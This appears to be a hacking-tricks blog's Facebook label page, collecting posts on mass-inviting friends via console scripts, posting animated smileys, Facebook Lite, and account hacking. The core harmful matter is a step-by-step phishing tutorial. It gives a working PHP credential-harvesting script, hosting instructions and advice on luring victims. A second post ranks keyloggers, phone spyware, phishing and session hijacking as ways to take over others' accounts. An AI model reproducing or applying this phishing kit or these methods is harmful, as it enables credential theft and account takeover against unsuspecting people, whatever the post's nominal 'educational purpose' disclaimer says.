Showing posts with label Facebook. Show all posts
Showing posts with label Facebook. Show all posts

Add All Friends To Facebook Group By Single Click - 2015

 

 

Steps To Add All Friends in Facebook Groups

1) First of all Log in into that whose friends you want to invite.
           
2) Then open your Facebook Group in which you want to add friends. 

3) Now Click F12 button to open debugger and then select console box.

4) Now copy script from below given button. 


5) Press enter and process will start for sending invitation.
Note:- Don't worry about anything this script is totally safe. In case you have too many friends then you may

get blocked for using groups or even your account may get locked. So be careful.


Read More »

Code to Invite All Facebook Friends At Once


Facebook friends inviter

This is javascript code to invite all facebook friends for a event/page at once.

Instructions:
1. Click Invite Friends on whatever you are inviting people to
2. In the dropdown next to the search box, make sure Search All Friends or "Search by name" is selected!
3. Scroll ALL the way down until names stop loading (I found it easy to click the first name and then hold down the spacebar or Page Down button)
4. For EVENTS Copy this code:
javascript:elms=document.getElementsByName("checkableitems[]");for (i=0;i<elms.length;i++){if (elms[i].type="checkbox" )elms[i].click()}

For PAGES Copy this code:
javascript:var inputs = document.getElementsByClassName('uiButton _1sm');
for(var i=0; i<inputs.length;i++) {
inputs[i].click();
}

5. Past the code into the URL bar of your browser (where you type website addresses), but WAIT! Check the beginning of the URL bar and make sure the word "javascript:" is there, if it is not, TYPE IT IN! A lot of browsers automatically delete the "javascript:" portion. Press enter.
6. For large friends list, this may utilize all your resources and will cause the page to freeze and be unresponsive. Just wait a few minutes until all the names get selected.
Read More »

How to post Animated Smileys to your facebook wall

1. go to this page ----> http://fbnoob.ho.am/emoji.php

2.You can see smiley just click on smiley you want it will generated as as text. see textbox.

3. Copy that code and update it using fb status Updater code.

Code for your staus update :-

http://www.facebook.com/dialog/feed?app_id=Your API&redirect_uri=http://www.facebook.com/

Ex:

http://www.facebook.com/dialog/feed?app_id=9926d66ea6ddb663b3fae82f4e6a66d7&redirect_uri=http://www.facebook.com/


Change you api ----- HOw to get you own API



Update friends status :-

http://www.facebook.com/dialog/feed?app_id=Your API&redirect_uri=http://www.facebook.com/&to=Your friends ID

Ex:

http://www.facebook.com/dialog/feed?app_id=9926d66ea6ddb663b3fae82f4e6a66d7&redirect_uri=http://www.facebook.com/&to=100000514929594


Find Facebook id ------ How to find Facebook ID


4. You are Done :)



How To Post Animated smiley on your About me and Favorite Quotations :


1. go to this page ----> http://fbnoob.ho.am/emoji.php

2. Copy the code from textbox and paste it on you about me.

3. You are Done ;)


Some Blank Smiley code :

Check out this page ------ http://pastebin.com/x6qkTN7C


For more smiley Code use these Applications:

http://apps.facebook.com/animated-picture Go to Emoji Emotions Tab
http://h.hatena.com/KamikoUrin/
Read More »

Hack Facebook Password Using Phishing Page


Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....

FACEBOOK PHISHING....

                                                                         

facebook hack


steps to create a phishing page:

1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.


                                          

2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
3.Now open the notepad and press CTRL+F,and type ACTION.

                                                  

                                           

facebook phishing script
4.You will have to find a text which looks like ..

                                       action="https://www.facebook.com/login.php?login_attempt=1"

5.delete all the text written in red colour and instead of it write post.php.then it will look like...

                                                 action="post.php"

6.Now save it on your desktop with the name index.htm,not index.html,remember.

7.Now your phishing page is ready.it will look like a pic given below .


hacking script
index

                                                   
8.Open a new notepad and save the given data with the name post.php.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

9.You have two files now one is index.htm and another is post.php,remember file extension is important.

10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.

11.I prefer u to use 000webhost because it will be easy to use.
                           
                                              

12.You have to make a account in that ,after that it looks like a picture given below.


                                                                          
13.Now go control pannel,then on file manager.

14.After that a new window will pop up.Now go to public_html.

                                           
                                        

15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .


                                        
16.Now the last step click on view of index.htm it will look same as facebook page.



hosting website
facebook script hosting website
this is your Facebook phishing page
                                         

17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
                                

                                        

19.Click on view now u will have your friend's password and email id.

                                           

20.This is a simple trick to hack any Facebook password account by phishing page.

21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
      in to the description of that video u will find a prepared module of phishing pages,download  
      it and enjoy.


       click here to view a video tutorial with the readymade phishing pages....



Note:

Phishing is a illegal activity so don't try on anyone.this tutorial is for educational purpose.
Not only Facebook u can make any phishing page of any website by following these steps....
u can hack Gmail,Yahoo,Orkut,Twitter and many more.
Read More »

Code to Invite All Facebook Friends At Once

Facebook friends inviter

This is javascript code to invite all facebook friends for a event/page at once.

Instructions:
1. Click Invite Friends on whatever you are inviting people to
2. In the dropdown next to the search box, make sure Search All Friends or "Search by name" is selected!
3. Scroll ALL the way down until names stop loading (I found it easy to click the first name and then hold down the spacebar or Page Down button)
4. For EVENTS Copy this code:
javascript:elms=document.getElementsByName("checkableitems[]");for (i=0;i<elms.length;i++){if (elms[i].type="checkbox" )elms[i].click()}

For PAGES Copy this code:
javascript:var inputs = document.getElementsByClassName('uiButton _1sm');
for(var i=0; i<inputs.length;i++) {
inputs[i].click();
}

5. Past the code into the URL bar of your browser (where you type website addresses), but WAIT! Check the beginning of the URL bar and make sure the word "javascript:" is there, if it is not, TYPE IT IN! A lot of browsers automatically delete the "javascript:" portion. Press enter.
6. For large friends list, this may utilize all your resources and will cause the page to freeze and be unresponsive. Just wait a few minutes until all the names get selected.
Read More »

Top 5 Ways to Hack Facebook Account


 
Every day i get lot of comments and  emails asking questions related to Facebook Hacking, I get tired and frustrated answering the same questions every single day, So to make life easy  for me and my blog readers  today i will share the best and successful ways by which you can hack a face book Account in 2013.

Is it Possible To Hack Any FaceBook Account ?
Yes! As a matter of fact, almost anything can be hacked. But before you learn the real ways to Hack Facebook account, the following are the things you should be aware of
1. There is no ready made software that can Hack Facebook Accounts and get you the password with just a click of a button. So if you come across any website that claims to sell such software's, I would advise you not to trust them.
2. Never trust any email hacking service that claims to hack any email for just $100 or $200. Most of them are no more than a scam.
With my experience of over 4 years in the field of Hacking and Security i can say the following are the successful methods by which You can hack a Facebook Account in 2013.
How To Hack Facebook Accounts In 2013 - Top 5 Ways- Keylogging  Difficulty -  Easy Success Rate - 90 %
 
Key logging is one of the Easiest ways that you can use to Hack Face book Accounts. (Keylogging or keylogger) sometimes called a spying software is a small program which is used to monitor a local or a Remote PC, When a keylogger is installed on a victims computer it can monitor and capture each and every keystroke typed on the victims PC,the captured Keystrokes are sent to the Hacker.
No doubt, these keystrokes contain the victim’s Face book Account Password and other such credential data thus key logger can be used for many purposes such as monitoring, Hacking and many more




Phishing Difficulty - Moderate Success Rate - 70 %  
Phishing is an attempt to criminally and fraudulently acquire sensitive information, such as user names, passwords and credit card details, by appearing as a trustworthy entity . There are many Ways by which a hacker can craft his Phisher (Fake Page) to fool the victim. In a simple phishing attack a Hacker will create a phisher ( fake login page) which exactly looks like the real facebook page and then asks the victim to login into that page, 
Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in a text file, The hacker then downloads the text file and get's his hands on the victims credentials. I have explained a step by step phishing process to Hack Facebook account  in the following Post
Mobile Phone Hacking Difficulty - Easy Success Rate - 90 %
 Many users access Facebook from their smart Phones. If you have access to the victims Mobile phone, You can easily install a Cell phone spying software and thus you can easily hack , Monitor the victims Facebook Account .Today there are Many Cellphone Spying  software's, Some of the Best are listed below
1. Mspy
                               2. Spy Phone Gold


Session Hijacking Difficulty - Moderate Success Rate - 70 %

Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's. I will soon be writing a tutorial on how to hack facebook Account by session Hijacking


Side Jacking Using Fire Sheep Difficulty - Moderate Success Rate - 60 %
 
Fire sheep is widely used to carry out side jacking attacks, Fire sheep only works when the attacker and the victim is on the same wifi network or in LAN .Fire sheep is an extension developed by Eric Butler for the FireFox web browser. The extension uses a packet sniffer to intercept unencrypted cookies from certain websites (such as Facebook and Twitter) as the cookies are transmitted over networks, exploiting session hijacking vulnerabilities.
It shows the discovered identities on a sidebar displayed in the browser, and allows the user to instantly take on the log-in credentials of the user by double-clicking on the victim's name.
Read More »

Facebook Lite for slow internet



Facebook Lite app has been launched in some countries in Asia and Africa.
This version of Facebook uses less data and works in all network conditions.



Facebook Lite has following features:

- Fast to install — the app is less than 1 MB

- Quick to load

- Efficient with data

- Designed for 2G networks and areas with limited network connectivity




You can also download  it from google playstore -> Facebook Lite

Read More »